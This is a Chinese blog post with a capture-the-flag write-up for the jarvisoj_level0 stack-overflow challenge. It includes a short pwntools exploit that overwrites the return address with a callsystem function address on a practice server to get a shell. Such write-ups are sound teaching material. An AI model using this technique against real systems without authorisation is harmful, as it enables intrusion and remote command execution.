PWN练习 栈溢出 程序员文章站 2024-01-20 09:40:52 ... jarvisoj_level0 关键字 easy 栈溢出 首先checksec 发现只开启NX保护,拖入ida main函数 callsystem函数 漏洞函数 解题思路 最基础的栈利用,根据覆盖调用函数时压栈的返回地址,执行系统函数调用。 EXP from pwn import * sh=remote("node3.buuoj.cn","29865") data=str("a"*0x88)+(p64(0x400596)) #此为callsystem地址 sh.sendline(data) sh.interactive() sh.close() 相关标签: PWN 上一篇: Zend Framework实现多服务器共享SESSION数据的方法_PHP 下一篇: 推荐阅读 PWN练习 栈溢出 PWN溢出——整数溢出漏洞分析 OpenBSD DHCPD 服务程序远程栈溢出漏洞 联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞 FreeBSD user-ppp协议实现本地栈溢出漏洞 BusinessObjects RptViewerAX ActiveX栈溢出漏洞 Move Media Player ActiveX控件栈溢出漏洞 栈溢出攻击及防护方法简介 C语言内存篇 | 14-栈溢出攻击的原理 Protostar栈溢出学习